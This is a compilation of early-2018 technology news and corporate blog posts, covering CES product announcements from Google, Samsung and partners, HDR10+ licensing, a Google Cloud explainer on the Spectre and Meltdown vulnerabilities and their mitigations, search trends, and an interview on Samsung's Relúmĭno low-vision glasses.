New voice-activated speakers powered by Android Things are being announced at CES, including the LG ThinQ WK7 and iHome iGV1. Turnkey hardware solutions based on the Qualcomm SD212 Home Hub Platform, MediaTek MT8516 and Rockchip RK3229 SoM are certified for the Assistant and Cast, and NXP i.MX 8M is coming soon. Three of our Original Design Manufacturer (ODM) partners, Tymphany, Goertek, and Tonly, have created full speaker reference designs based on these SoMs to further reduce development cost and time-to-market.

Today, we also announced that the Google Assistant is coming to smart displays powered by Android Things. These new devices have the Assistant and Cast built in, and with the added benefit of a touch screen, they can help you see and do more. Smart displays from JBL, Lenovo, LG (all based on the Qualcomm SD624 Home Hub Platform) and Sony (based on the MediaTek MT8173 SoM) will be available later this year.

Of course, Android Things is designed to support a wide variety of devices beyond speakers and smart displays. Prototype demos can be found in the NXP booth, such as HandBot, DrawBot, 3D printer, and AI artwork T-shirts.

Starting tomorrow, you can visit the Google Assistant Playground (booth CP-21) at CES to view new products, chipsets, and reference designs by our partners. In addition, these devices are also available for display in other company spaces throughout the conference, including Lenovo, LG, JBL, Qualcomm, MediaTek, NXP, Rockchip, iHome, Goertek, and Tymphany.

Android Things is currently in Developer Preview, and you can get started with the latest version DP6.1. You can use the Android Things Console to download system images and flash existing devices. Feedback can be given by filing bug reports and feature requests, as well as on Stack Overflow or our Google's IoT Developers Community. The Long Term Support release will be available this year, with more details coming soon.

Samsung Expands Laundry Line Up with New Premium Compact Washer

 

Samsung Electronics today announced that it is bringing its next generation laundry innovation to the U.S.:  the WW6850N washing machine featuring revolutionary QuickDrive™ technology. Responding to consumer demand for speed and cleaning performance, the 24” compact washer cleans laundry up to 35% faster for a thorough clean1, compared to current Samsung models. The WW6850N will be on display at the upcoming International Consumer Electronics Show (CES) in Las Vegas from January 9-12, 2018.

 

With more Millennials than ever buying homes, this new cohort of digitally savvy homebuyers is demanding home appliances that incorporate meaningful, personalized technology to enhance their lives. The WW6850N with QuickDrive™ technology is just the latest in a line of differentiated laundry innovations, including the activewash™ Top Load Washer, AddWash™ Front Load Washer and FlexWash + FlexDry laundry pair.

 

“When you’ve got a pile of laundry to do, you just want to get it done as quickly and efficiently as possible,” said Shane Higby, Vice President, Home Appliance Marketing, Samsung Electronics America. “The introduction of the WW6850N washing machine with QuickDrive™ technology underscores our commitment to providing consumers with options for tackling their laundry needs to free up time for what really matters.”

 

The WW6850N washer’s innovative performance starts with QuickDrive™ technology, which features a large main drum and a back plate that move independently. This creates a dynamic action that moves clothes in four directions – up and down, and back and forth – to quickly, gently and thoroughly remove dirt for a more powerful and intense wash cycle that takes up to 35% less time than other comparable Samsung machines1. Additionally, at 24” wide and stackable, the WW6850N washer and its companion dryer are an ideal size for small spaces like first floor laundry rooms or closets just off the master suite, to conveniently tackle loads quickly and effectively.

 

The WW6850N is IoT-ready and compatible with Samsung’s SmartThings ecosystem. Its Q-rator laundry assistant has smart capabilities that simplify the washing cycle with intuitive features:

 

  • Laundry Recipe provides automatic recommendations for optimal wash cycles based on the color, fabric type, and degree of soiling inputted by the user.
  • Laundry Planner allows consumers to manage the time that a wash cycle will finish, adjusting cycle settings accordingly.
  • HomeCare Wizard monitors the washer to keep it operating at optimal performance and provides easy-to-follow maintenance instructions

 

A 2018 CES Innovations Award honoree, the WW6850N washing machine with QuickDrive™ technology will be available in the U.S. this year.

 

 

1 Tested on Samsung WW6850N with WW6800K. Saves up to 35% time on Heavy Duty (hot, 6lb load) with a washing performance within ± 3%, based on internal data tested by AHAM HLW-1-2013.

20th Century Fox, Panasonic and Samsung Gain Momentum for Best Possible TV-Viewing Experience with HDR10+ Technology

20th Century Fox, Panasonic Corporation and Samsung Electronics today announced updates to the associated certification and logo program for the open, royalty-free dynamic metadata platform for High Dynamic Range (HDR), called HDR10+ which they initially announced last year at IFA.

 

The HDR10+ platform will soon be made available to content companies, ultra-high definition TVs, Blu-ray disc players/recorders and set-top box manufacturers, as well as SoC vendors, royalty-free with only a nominal administrative fee. Companies can view the new logo, learn about the license program including final specifications, adopter agreements and sign up to receive a notification when technical specifications for HDR10+ become available at http://www.hdr10plus.org. In addition, Ultra HD Blu-ray metadata generation tools have been developed with third parties and will soon be available for content creators enabling Ultra HD Blu-ray players to enter the market. Details on the content transfer and interface format for the content creation pipeline will also be released shortly.

 

HDR10+ will offer a genuinely premium HDR experience for viewers through a device certification program ensuring an accurate representation of the creative intent expressed in the content. Also, its workflow improvements for creators will encourage increased production of premium HDR content.

 

The HDR10+ license program will provide interested companies with the necessary technical and testing specifications to implement HDR10+ technology in a way that both maintains high picture quality and gives each manufacturer the ability to apply dynamic tone mapping innovatively. The accompanying certification program will ensure that HDR10+ compliant products meet good picture quality and deliver the creative intent of movie directors and cinematographers. A certified product will feature the HDR10+ logo, which signifies the product’s excellent picture quality.

 

 

Key aspects of the license program will include:

 

  • Benefits for device manufacturers (e.g., TV, Ultra HD Blu-ray, OTT STB, etc.), content distribution services providers, SoC manufacturers, content publishers, and content creation tool providers.
  • No per unit royalty.
  • A nominal annual administration fee for device manufacturers, SoC manufacturers and content distribution service providers.
  • Technical specification, test specification, HDR10+ logo/logo guide, patents from the three companies directly related to the technical specification and the test specification.
  • Certification for devices will be performed by a third-party, authorized testing center.

 

Once the HDR10+ license program is open, the three founding companies will incorporate HDR10+ technologies in all future Ultra HD movie releases, selected TVs, Ultra HD Blu-ray player/recorders, and other products.

 

“It was important for us to create an open system that is flexible and offers a viewing experience much closer to the filmmaker’s creative intent for the film,” said Danny Kaye, Executive Vice President of 20th Century Fox, and Managing Director of the Fox Innovation Lab. “Together with Samsung and Panasonic, we aim to standardize the licensing process making it easy for partners, including content creators, television and device manufacturers, to incorporate this technology and improve the viewing experience for all audiences.”

 

Support continues to grow for HDR10+ and companies are looking forward to applying the 3C specifications and certification program. More than 25 companies spanning many different industries have expressed strong interest in supporting the HDR10+ platform, further reinforcing its path to success.

 

Amazon Prime Video, the first streaming service provider to deliver HDR10+, has made the entire Prime Video HDR library available in HDR10+ globally. The Prime Video HDR10+ catalog includes hundreds of hours of content such as Prime Originals The Grand Tour, Golden Globe®-nominated The Marvelous Mrs. Maisel, Jean-Claude Van Johnson, The Tick and The Man in the High Castle plus hundreds of licensed titles.

 

Warner Bros. Home Entertainment will support HDR10+ to enable a dynamic metadata solution for Warner Bros. content to Samsung, Panasonic and other HDR10+ capable 4K HDR TVs. “Warner Bros. has always strived to provide the best next gen home entertainment experience to consumers,” said Jim Wuthrich, President of the Americas and Global Strategy, Warner Bros. Home Entertainment. “With HDR10+ dynamic metadata, WB can continue to more accurately bring the filmmakers’ vision of our 2018 releases and our vast catalog of over seventy-five 4K HDR titles to the home across a broad range of HDR10+ capable TV’s.”

 

The new HDR10+ technology optimizes picture quality for next generation displays by using dynamic tone mapping to reflect frame to frame or scene to scene variations in brightness, color saturation, and contrast, which makes for an enhanced viewing experience. HDR10+ technology optimizes the performance of many 4K ultra-high definition TVs, enabling playback on a wide range of next generation TVs bringing user experience much closer to the original creative intent for Hollywood films.

 

“By bringing together know-how and technology from the three founding companies, HDR10+ has the potential to deliver considerable picture quality benefits to both viewers and creators alike,” said Toshiharu Tsutsui, Director of Panasonic’s TV Business Division. “Accordingly, Panasonic anticipates wide support for HDR10+.”

 

“Samsung is committed to technological innovation across our TVs and HDR10+ represents an evolution in display quality for the best possible viewing experience,” said Jongsuk Chu, Senior Vice President of Visual Display Business at Samsung Electronics. “We have also designed the HDR10+ platform to encourage future development in order to deliver further enhanced technology in the years to come.”

 

20th Century Fox, Panasonic and Samsung will show technical demonstrations of HDR10+ technology at CES 2018. Accredited journalists or parties interested in the licensee program may email chris.bess@fox.com for more information. Accredited journalists can see Panasonic’s HDR10+ technical demo at its suite at the MGM Grand Conference Centre. A HDR10+ technology demo will be held at Samsung’s First Look event at Enclave Las Vegas on 7th January.

 

To learn more about the HDR10+ license program, please contact the HDR10+ license administration office at info@hdr10plus.org.

 

 

About Twentieth Century Fox Home Entertainment

Twentieth Century Fox Home Entertainment, LLC (TCFHE) is the industry leading worldwide marketing, sales and distribution company for all Fox produced, acquired and third-party partner film and television programming. Each year TCFHE expands its award-winning global product portfolio with the introduction of new entertainment content through established and emerging formats including DVD, Blu-ray™, Digital and VOD. Twentieth Century Fox Home Entertainment is a subsidiary of 20th Century Fox, a 20th Century Fox Company.

 

About Panasonic

Panasonic Corporation is a worldwide leader in the development of diverse electronics technologies and solutions for customers in the consumer electronics, housing, automotive, and B2B businesses. Celebrating its 100th anniversary in 2018, the company has expanded globally and now operates 495 subsidiaries and 91 associated companies worldwide, recording consolidated net sales of 7.343 trillion yen for the year ended March 31, 2017. Committed to pursuing new value through innovation across divisional lines, the company uses its technologies to create a better life and a better world for its customers. To learn more about Panasonic: http://www.panasonic.com/global.

[Editorial] Do Everything, Everywhere with Samsung’s New Ultraslim Notebooks

There’s no denying it – the PC industry has changed. With tablets, smartphones, and wearables, we have the ability to shape our computing experience around our lives like never before. But that doesn’t mean that the PC market is shrinking. Far from it – it’s evolving in a whole new way. Consumers who once preferred a traditional laptop are choosing slim, powerful notebooks that give them the flexibility to do everything, everywhere.

 

That’s important, because the way we work has changed as well. For many, the work day begins the moment they wake up, and often stretches well beyond dinner time. In 2018, true portability and productivity is knowing you have a single notebook that makes it possible to do what you can’t do with just a tablet or desktop. It’s thin enough to slip into your “go” bag. It’s light enough to carry all day, every day, and almost forget it’s there. It’s strong enough to endure the bumps in the road and the inevitable scrapes from the airport security bin.

 

At Samsung, we’re leading the evolution of the PC. Our portfolio includes 2-in-1 tablets with detachable keyboards, for those who want the ultimate in portability, along with Samsung Chromebooks, for those who want access to their favorite Google apps and services. For those who want the ultimate in power, portability, and performance, I’m excited to introduce a new series of PCs.

 

Our new ultraslim notebooks combine convenience with performance and design – establishing what it means to create a premium PC experience for the way we live and work today. Whether you’re working up an important presentation, drafting your next big plan, or playing your favorite game on the go, you need immersive graphics, processing power, and frame rate. Our new series of notebooks give you the screen, power, graphics, memory, storage, and battery life to make your old laptop seem, well, old.

 

Before we engineered our new notebooks, we listened to you. We heard what you wanted and what you needed. You told us you wanted the flexibility to do, with one notebook, more than you can do with a simple tablet or a thick laptop. So we designed a range of mobile computing experiences to meet the needs of the modern, mobile workforce—helping everyone do more at home, at the office, and on the go.

 

Versatility and performance are important – but as any frequent traveler will attest, durability is important as well. Keeping that in mind, we’ve developed an entirely new material to wrap it all up: Metal 12™. This magnesium alloy is incredibly light, yet unbelievably strong – and feels amazing in hand. And Metal 12™ is available only on Samsung devices. It’s one more way our investments in R&D are delivering next-level durability and premium design.

 

Our new series of ultrathin notebooks are designed for different people with different needs, who want to use their time in the most productive way they can:

 

Samsung Notebook 9 Pen with the built-in S pen

 

Notebook 9 Pen is the ultraslim 2-in-1 convertible for those who want the most computing power with the creative power of the S Pen. Perfected in Samsung Galaxy mobile devices, the battery-free S Pen replicates the ease, accuracy, and size of a real pen, so you can enjoy a natural writing and drawing experience – without having to ever charge it. Jot notes. Use CAD. Sketch freehand. If you want to work, create, design or draw, the Notebook 9 Pen puts no limit on how you can express yourself. It’s a whole new way to use your notebook PC.

 

Samsung Notebook 9 (2018)

 

Notebook 9 (2018) is the notebook for those who want the most powerful graphics in the slimmest package. When you’re on the go – whether on business travel, headed to class, working, taking a laptop is a still given. With this extremely light PC that weighs no more than 2.84 pounds, Samsung is actually taking weight off your back and creating more room in your pack. The Notebook 9 (2018) has all the durability with none of the weight. Powerful graphics bring movies and games to life on screen, with battery capacity that allows you to stay immersed in your favorite content throughout the day.

 

Samsung Notebook 7 Spin (2018)

 

Notebook 7 Spin (2018) is the “best of basics” 2-in-1 convertible for those who want Samsung design at an affordable price. If you’re always moving from home to office or from class to class, flexibility is the name of the game. With the Notebook 7 Spin (2018) you can flip easily from PC to tablet—and back, work anywhere—even in the dark—with the backlit keyboard, and use your Active Pen (sold separately) to express yourself in an entirely new way. The Notebook 7 Spin (2018) design gives you the flexibility to work anywhere, and the Intel 8th Generation Quad Core Process gives you the power to do it all.

 

I’m excited to show off our new ultraslim notebooks at CES this year. They’re compact, powerful, and designed to deliver a premium experience that’s all about helping you create more and enjoy more, wherever you are.

Samsung Introduces the New Notebook 7 Spin (2018), a Flexible PC for Everyday Users

 

Samsung Electronics today announced the Samsung Notebook 7 Spin (2018), a versatile notebook that provides consumers with the accessibility needed to remain productive in today’s digital world.

 

Designed for working professionals, students and those looking for entertainment, the Notebook 7 Spin (2018) offers modern features including a 360-degree touchscreen for added convenience; an Active Pen (sold separately) for quick and easy note-taking; as well as the power and performance for more efficient multi-tasking.

 

“Our customers wanted a functional, intuitive device that includes a wide range of their favorite features, and that’s what we’ve delivered with the Notebook 7 Spin (2018),” said YoungGyoo Choi, Senior Vice President of the PC Business Team, Mobile Communications Business at Samsung Electronics. “This device meets the needs of today’s digital lifestyle, combining work and play with a smart, seamless and personalized experience that connects users with their other devices.”

 

At CES 2018, Samsung will showcase the new Notebook 7 Spin (2018) and a variety of features that allow consumers to work wherever, whenever and however they want while staying secure. These features include:

 

  • 360-Degree Rotating Touchscreen – Provides the flexibility to view content as preferred, whether it be as a tablet or as a traditional PC in landscape mode
  • Active Pen-enabled – Perfect for attending meetings, conference calls or lectures, the Active Pen lets users create a sketch or jot down notes on the fly
  • Secure Fingerprint Log-in – Through simple fingerprint scanning, users can quickly log-in with Windows Hello and keep files secure in their own Privacy Folder
  • Power and Performance – Runs on Windows 10 operating system and equipped with an Intel i5 processor and 256GB SSD drive that allows for quicker startups and advanced multi-tasking capabilities
  • Voice Note – Advanced smart recording featuring an integrated far field microphone to capture every detail of important meetings or lectures, which can be stored and shared easily via Samsung Cloud
  • Battery and Backlit Keyboard – Extended battery power to keep users connected throughout the day
  • Studio Plus – For users who wish to express their creative side, Studio Plus allows them to produce personalized movies featuring their favorite photos and videos

 

The Samsung Notebook 7 Spin (2018) will be available in select countries starting in the first quarter of 2018 in the U.S.

 

 

Samsung Notebook 7 Spin (2018) Product Specifications*

PROCESSOR 8th i5 Quad Core
MEMORY 8GB, 256GB
MATERIAL A/C Metal
LCD 13.3” FHD PLS
DIMENSION 315.8 x 215.4 x 18.5mm
POWER 43Wh
WEIGHT 1.53kg
PORTS USB-C, USB 3.0 x1, USB 2.0x 1, HDMI, HP/Mic
CAMERA VGA
STYLUS Active Pen
SECURITY Fingerprint, Windows Hello, Privacy Folder
KEYBOARD Backlit KBD, Keystroke 1.5mm, Curved keycap
Clickpad (Precision Touchpad)

 

*All functionality, features, specifications and other product information provided in this document including, but not limited to, the benefits, design, pricing, components, performance, availability, and capabilities of the product are subject to change without notice or obligation.

Bringing Programmability and NetDevOps to Barcelona for #CLEUR

It’s right around the corner… Cisco Live Europe 2018 in Barcelona, and I absolutely can’t wait!  Every Cisco Live I’ve ever been to, or presented at, has been an amazing experience, but Barcelona is going to be in a league of its own.  From the moment I arrive in Spain on Friday morning the entire […]

Five Things You Can Do to Manage Your Privacy Now

The Internet of Things – the increasingly connected world in which we live – is rapidly expanding. We love our convenient and fun ​devices – ​like​ ​personal assistants, wearables, speakers, cameras, TVs, cars, home alarm systems, toys and appliances. But it’s important to understand that connected devices rely on information about us – such as […]

Answering your questions about “Meltdown” and “Spectre”

This week, security vulnerabilities dubbed “Spectre” and “Meltdown” made news headlines. On Wednesday, we explained what these vulnerabilities are and how we're protecting you against them.

Since then, there's been considerable discussion about what this means for Google Cloud and the industry at large. Today, we’d like to clear up some confusion and highlight several key considerations for our customers.

What are “Spectre” and “Meltdown”?


Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.

Independent researchers separately discovered and named these vulnerabilities “Spectre” and “Meltdown.” 

Project Zero described three variants of this new class of speculative execution attack. Variant 1 and Variant 2 have been referred to as “Spectre.” Variant 3 has been referred to as “Meltdown.” Most vendors are referring to them by Common Vulnerabilities and Exposures aka “CVE” labels, which are an industry standard way of identifying vulnerabilities.

security-1

There's no single fix for all three attack variants; each requires protection individually.

Here's an overview of each variant:

  • Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis. This variant is currently the basis for concern around browser attacks, Javascript exploitation and vulnerabilities within individual binaries.

  • Variant 2 (CVE-2017-5715), “branch target injection.” This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software protection called “Retpoline” to binaries where concern about information leakage is present. This variant is currently the basis for concern around Cloud Virtualization and “Hypervisor Bypass” concerns that affect entire systems.

  • Variant 3 (CVE-2017-5754), “rogue data cache load.”  This variant is the basis behind the discussion around “KPTI,” or “Kernel Page Table Isolation.” When an attacker already has the ability to run code on a system, they can access memory which they do not have permission to access.

For more information on these variants, please read this week’s Google Security post.

Am I protected from Spectre and Meltdown?  


Google’s engineering teams began working to protect our customers from these vulnerabilities upon our learning of them in June 2017. We applied solutions across the entire suite of Google products, and we collaborated with the industry at large to help protect users across the web.

G Suite and Google Cloud Platform (GCP) are updated to protect against all known attack vectors. Some customers may worry that they have not been protected since they were not asked to reboot their instance. Google Cloud is architected in a manner that enables us to update the environment while providing operational continuity for our customers. Via live migration we can patch our infrastructure without requiring customers to reboot their instances.

Customers who use their own operating systems with Google Cloud services should continue to follow security best practices and apply security updates to their images just as they would for any other operating system vulnerability. We're providing an up-to-date reference on the availability of vendor patches for common operating systems on our GCE Security Bulletin page.


I’ve heard that Spectre is nearly impossible to protect against. Is this true?


There has been significant concern in particular about “Spectre.” The use of the name “Spectre” to refer to both Variants 1 and 2 has caused some confusion over whether it's “fixed” or not.

Google Cloud instances are protected against all known inter-VM attacks, regardless of the patch status of the guest environments, and attackers do not have access to any customers’ data as a result of these vulnerabilities. Google Cloud and other public clouds use virtualization technology to isolate neighboring customer workloads. A virtualization component known as a hypervisor connects the physical machine to virtual machines. This hypervisor can be updated to address Variant 2 threats. Google Cloud has updated its hypervisor using “Retpoline,” which addresses all currently known Variant 2 attack methods.

Variant 1 is the basis behind claims that Spectre is nearly impossible to protect against. The difficulty is that Variant 1 affects individual software binaries, so it must be handled by discovering and addressing exploits within each binary.

Risks that Variant 1 would pose to the infrastructure underpinning Google Cloud are addressed by the multiple security controls that make up our layered “defense in depth” security posture. Because Google is in full control of our infrastructure from the hardware up to our secure software development practices, our infrastructure is protected against Variant 1. You can read more about the security foundations of our infrastructure in our whitepaper.

We work continuously to stay ahead of the constantly-evolving threat landscape and will continue to roll out additional protections to address potential risks.

As a user of the public cloud, am I more vulnerable to Spectre and Meltdown than others?

In many respects, public cloud users are better-protected from security vulnerabilities than are users of traditional datacenter-hosted applications. Security best practices rely on discovering vulnerabilities early, and patching them promptly and completely. Each of these activities is aided by the scale and automation that top public cloud providers can offer — for example, few companies maintain a several-hundred-person security research team to find vulnerabilities and patch them before they're discovered by others or disclosed. Having the ability to update millions of servers in days, without causing user disruption or requiring maintenance windows, is difficult technology to develop but it allows patches and updates to be deployed quickly after they become available, and without user disruption that can damage productivity.

Spectre and Meltdown are new and troubling vulnerabilities, but it’s important to remember that there are many different types of threats that Google (and other cloud providers) protect against every single day. Google’s cloud infrastructure doesn’t rely on any single technology to make it secure. Our stack builds security through progressive layers that deliver defense in depth. From the physical premises to the purpose-built servers, networking equipment, and custom security chips to the low-level software stack running on every machine, our entire hardware infrastructure is Google-controlled, -secured, -built and -hardened.

Is performance impacted?

On most of Google’s workloads, including our cloud infrastructure, we've seen negligible impact on performance after applying remediations. This was explained further in our follow-up Security blog post on January 4.

There are many conflicting reports about patch impacts being publicly discussed. In some cases, people have published results of tests that focus solely on making API calls to the operating system, which does not represent the real-world scenario that customer software will encounter. There's no substitute for testing to determine for yourself what performance you can expect in your actual situation. We believe solutions exist that introduce minimal performance impact, and expect such techniques will be adopted by software vendors over time. We designed and tested our mitigations for this issue to have minimal performance impact, and the rollout has been uneventful.

Where can I get additional information?

  • Our Support page offers a list of affected Google products and will be updated with their current status of mitigation against these risks

  • Our GCP Security Bulletins page will provide notifications as other operating system maintainers publish patches for this vulnerability and as Compute Engine releases updated OS images

Threat Round Up for December 29 – January 5

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between December 29 and January 05. As with previous round-ups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically […]

New year, new searches: resolutions, “bomb cyclone” and Coachella

It’s a new year, and some of this week’s trends (with data from Google News Lab) are about adjusting: to a new gym routine, unexpected weather, and a new law in California.

Treadmill time

New Year’s resolutions = more searches for “gyms near me.” In fact, search interest in the phrase hit an all-time high this month. Despite a heightened desire to hit the gym, interest in “new year diet” was 200 percent higher than “new year exercise” this week. Looking ahead to the new year, people are wondering: “What is a New Year’s resolution for kids?” “What is the history behind New Year’s resolutions?” and “Who made the first New Year’s resolution?”

Do you wanna build a snowman?

“What is a bomb cyclone?” was a top-searched question this week as a massive winter storm hits the east coast of the U.S. Snow is showing up in unexpected places around the country as well. When people search for “Snow in...” the post popular locations are Florida, Tallahassee and Orlando. And with cold weather taking over, search interest in “frozen pipes” has reached its highest point this week since 2004. Top “how to” searches include “how to thaw frozen pipes,” “how to keep pipes from freezing,” and “how to fix frozen pipes.”

Desert calling

Despite the cold weather, people have something warm to look forward to: The lineup for Coachella 2018 was announced this week, and search interest in “Coachella tickets” went up nearly 6,500 percent. Coachella-goers are already looking into lodging, with “Coachella airbnb” searched 100 percent more than “Coachella hotel.” The top-searched Coachella performers were Cardi B, Eminem, Beyoncé, Post Malone and Migos.

bey

Coachella isn’t even the biggest news in California …

Recreational marijuana was people’s minds (and on sale for the first time in California) this week. In California, top questions included “where to buy legal weed in Los Angeles,” “What is the tax on weed in California,” and “Where can I buy marijuana?” Meanwhile, following the announcement that the Justice Department is rescinding a policy that enabled legalized marijuana to flourish in many states, the top trending question nationwide was “Why are marijuana stocks down?”

Ready for the coin toss in the South

For the first time, two SEC teams—University of Alabama and University of Georgia—will face off in the College Football National Championship on Monday. Though the game’s outcome is yet to be decided, search interest in “Alabama Crimson Tide football” is beating “Georgia Bulldogs football” by 190 percent. After Georgia’s overtime win in the semi-final, the top trending college football questions this week were about overtime: “How does overtime work in college football?” “How many overtimes are in college football?” and “How long is overtime in college football?”

How Google Home and the Google Assistant helped you get more done in 2017

Both the Google Assistant and Google Home had a very big year in 2017, with new devices, new languages and new features. The Assistant is now available on more than 400 million devices, including speakers like Google Home, Android phones and tablets, iPhones, headphones, TVs, watches and more. We brought the Google Assistant to a dozen countries, from France to Japan, offering help in 8 languages around the globe.

With Google Home Mini and Google Home Max in addition to our original Google Home, we brought you even more ways to use the Assistant in your home. So it’s no wonder we’ve sold tens of millions of all our Google devices for the home over this last year. And in fact, we sold more than one Google Home device every second since Google Home Mini started shipping in October.

As we’ve added more features—like Voice Match,  Broadcast and Hands-Free Calling—the Google Assistant has become even more helpful. Your Assistant now gives you the power to voice control more than 1,500 compatible smart home devices from over 225 brands. With all these choices, you've connected millions of new smart home devices to Google Home every month. All told, Google Home usage increased 9X this holiday season over last year’s, as you controlled more smart devices, asked more questions, listened to more music, and tried out all the new things you can do with your Assistant on Google Home.

No matter where you are, the Google Assistant is here to help you make the most of 2018. And next week, we have even more things in store for the Assistant at the Consumer Electronics Show in Las Vegas. If you’re at CES, stop by the Google Assistant Playground (Central Plaza-21) to check out some of our new integrations, devices, and the newest ways you can use your Assistant.

ces

[Interview] An Inside Look at the Development of Relúmĭno

This year at CES, Samsung showcases Relúmĭno glasses – smart visual aid eyeglasses to help people with vision challenges see images clearer when they are reading a book or viewing an object. And Relúmĭno and Relúmĭno glasses are expected to help people with visual impairments to utilize the technology more comfortably.

 

But what exactly did it take to develop a product like Relúmĭno? Last year, Samsung had partnered with Professor Moon Nam Ju’s team at Department of Ophthalmology of Chung-Ang University Hospital for clinical trials involving Relúmĭno. Here, Professor Moon discusses the team’s effort to make Relumino more convenient and helpful for people with visual impairments.

 

 

 

Q. Please introduce your clinical research team.

 

The low vision clinic of Chung-Ang University Hospital has oculists, nurses, opticians and hospital social workers. It provides support for people with low vision to help them overcome the obstacles of their everyday life and achieve a better quality of life. Our clinic and Relúmĭno, a project team of Samsung C-Lab, worked together for the clinical trial.

 

 

Q. How did you become a part of Relúmĭno development?

 

I was always concerned with ways to help patients with low vision in their rehabilitation. Unfortunately, many of these patients consider themselves blind and give up on treatment, resulting in lost opportunities to get better. When Jeonghun Cho, Leader of Relúmĭno, came to me with his plan for Relúmĭno, it was a new inspiration. I joined the project willingly as Leader Cho’s intentions were good and genuinely focused on the well-being of patients.

 

 

Q. Please explain the clinical trials for the development of Relúmĭno.

 

We recruited patients with vision impairment who also know how to use electronic devices. We surveyed the patients to find out what low-vision aids they were already using, the purpose of these visual aid devices as well as the patients’ satisfaction level of the device. We also analyzed clinical improvements of patients by repeating visual function examinations of maximum corrected eyesight on long and short distance, contrast sensitivity as well as reading speed before and after using the devices.

 

 

Q. How did the examinations proceed?

 

Patients who were not satisfied with the conventional, low vision aid devices were mostly positive about the clinical trial. Among low vision patients who participated the trial, around 40 patients were selected to be examined for their visual functions without using any aid devices. After explaining to the patients the functions of Relúmĭno and how to use them, we reexamined the patients.

 

 

Q. Regarding research design and trial procedures, was there anything you considered particularly?

 

Most of the people with low vision use magnifiers to see objects in short distances. For long distances, telescopes can be used, but they are not as useful as they are not easy to carry and make users’ visions narrow. When we designed Relúmĭno, we wanted to make a vision aid device that can support both short and long distances at the same time. Also, we wanted to add a function that can help the patients with damages to macula lutea to see clearly as those patients could not be helped with the conventional optical vision aid devices.

 

 

Q. What was the result of clinical trials?

 

A total of 39 patients out of 40 completed the trial and their average age was 54.64 (standard deviation 22.70). Over 97% of patients had significant improvement in their vision in short, medium and long distances while using the device. People with low vision who had a maximum of 0.1 in corrected eyesight used Relúmĭno to achieve up to 0.8 corrected eyesight.

 

 

Also, their contrast sensitivities and reading accuracy increased significantly in statistics. On device satisfaction, all patients responded that they are satisfied with the performance of Relúmĭno, and more than half (54%) of patients answered that the device was easy to use. Also, as the patients rated their average visual functions for everyday activities around 11.7 points (total 30 points), but the number increased to 19.5 points after using the device.

 

 

Q. Has there been any feedback from the patients with low vision in the clinical trial reflected in Relúmĭno? Please explain which feedback was well implemented.

 

Relúmĭno went through several improvements to become the product that you see today. We had several meetings to listen to what the patients have to say. In the beginning, patients had difficulties with dizziness, slow focusing speed and difficult control over the device. The Relúmĭno team immediately reflected patients’ feedback and updated based on the patients’ wants, and that is one of the most important reasons why the result is so successful.

 

 

Q. Can you give us some cases where patients received huge benefits from using the Relúmĭno app?

 

All patients who participated the research were very much satisfied with Relúmĭno. One of the patients, who could only see the front from an “eccentric view” by turning the head due to damage of macula lutea, was happy that Relúmĭno eliminated the need to turn the head to see the front using a relocation function. Also, another patient who suffered from depression due to unemployment status after losing sight used Relúmĭno app and regained strength to live a normal life again. That patient got another job and thanked us several times.

 

 

Q. Please tell us your expectations on Relúmĭno in the future.

 

Lately, many people are interested in the area of low vision, but there are not enough rehabilitation facilities and resources for people with low vision in Korea. As the saying well begun is half done, I hope Relúmĭno would be the foundation of drawing more attention and supports for people with low vision to give them courage and hope to achieve their better future.

[Editorial] Delivering on the Promise of a Connected World, Today

For those of us in the tech and related industries, the start of each new year represents a period for our own personal moments of reflection, but also as professionals and those passionate about technology to share and envision together the latest in technology innovation at the annual Consumer Electronics Show (CES) in Las Vegas.

 

For the past several years, the Internet of Things (IoT) has remained the industry’s biggest buzzword for its promise of delivering seamless connectivity across the multiple devices and technologies that we interact with in our daily lives – from our smartphones to smart TVs to Family Hub refrigerator to even our cars. Yet while the vision has been alluring, with IoT and related technologies still maturing, the promise has always remained ‘a few years off’.

 

At CES 2018, our aim, at Samsung, will be to show you the work we’ve done to change that, and to begin delivering on the promise of a connected world, today.

 

Across the many and various devices consumers interact with in their places of business, homes, and while on the go, each is typically encumbered by a different setup process, password to remember, and interface to learn and manage, which has made the connected experience anything but easy.

 

At Samsung, we decided to do something about this, and at this year’s CES, we’ll be sharing our breakthroughs to make the IoT experience easy and intuitive for you, which has involved delivering seamless connectivity between any device through a single experience, backed by an integrated ecosystem to manage all the devices in close, fluid synchronization.

 

The connected experience we will be introducing also is powered by a personalized intelligence interface, with the aim of ensuring you are able to tap into all the potential and power this connectedness provides, as easily as if you were flipping a switch. Understanding that innovation on this scale and delivering on a truly connected world can’t happen in a silo, we’ve also worked closely with industry partners as part of the largest IoT standardization body, the Open Connectivity Foundation (OCF), which I will also be sharing about further at the show.

 

Until now, the promise of a world of connected devices has remained too fragmented, and as result too complex and difficult for consumers to navigate or practically take advantage of. However, a connected world, should be anything but. It should work for you, and make life easier for you. I couldn’t be more excited to share with you further on how Samsung is bringing this vision to reality now in just a few days time at CES 2018.

NEW DevNet Sandbox! Play live with Istio on Kubernetes to manage your microservice mesh

Most of the development world is aware of the microservices and containerisation movement, given we’re now in 2018! When folks start working with microservices, they quickly realise that they proliferate fast. One application can contain a large number of microservices that all need to interact and talk to each other for lots of different reasons […]

Top 10 Smart City Trends for 2018

Did you know that Smart Cities are poised to drive significant change in how we work, play and learn in 2018? Thanks to the explosion in big data analytics capabilities and mobile, real-time video/information sharing, historians may someday look back on this year as the fulcrum upon which technology and government fully meshed to turn […]

Google for Nonprofits: 2017 in review

Every year nonprofits worldwide work tirelessly to make a positive impact in their communities, and in a year where many people were looking to help, 2017 was no exception. We’re looking back to celebrate the nonprofits around the globe using Google tools to help in their philanthropic efforts. Here are some successes from last year—we hope they give you some ideas for how you can improve your nonprofit’s productivity and have even more impact in 2018.

Unlocking G Suite for Nonprofits

